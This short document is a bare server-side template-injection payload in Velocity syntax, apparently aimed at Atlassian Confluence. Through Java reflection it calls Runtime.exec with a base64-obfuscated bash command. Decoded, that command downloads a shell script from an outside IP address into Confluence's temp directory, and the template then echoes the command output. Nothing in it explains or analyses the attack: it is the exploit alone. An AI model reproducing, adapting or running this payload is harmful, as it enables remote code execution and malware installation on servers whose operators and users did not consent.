#set($ex=$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec("bash -c {eval,$({tr,/+,_-}<<<d2dldCBodHRwOi8vODkuMjIxLjUyLjEyMi9zLnNoIC1PIC9vcHQvYXRsYXNzaWFuL2NvbmZsdWVuY2UvdGVtcC9zLnNo|{base64,--decode})}"))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
$out.read()
#end
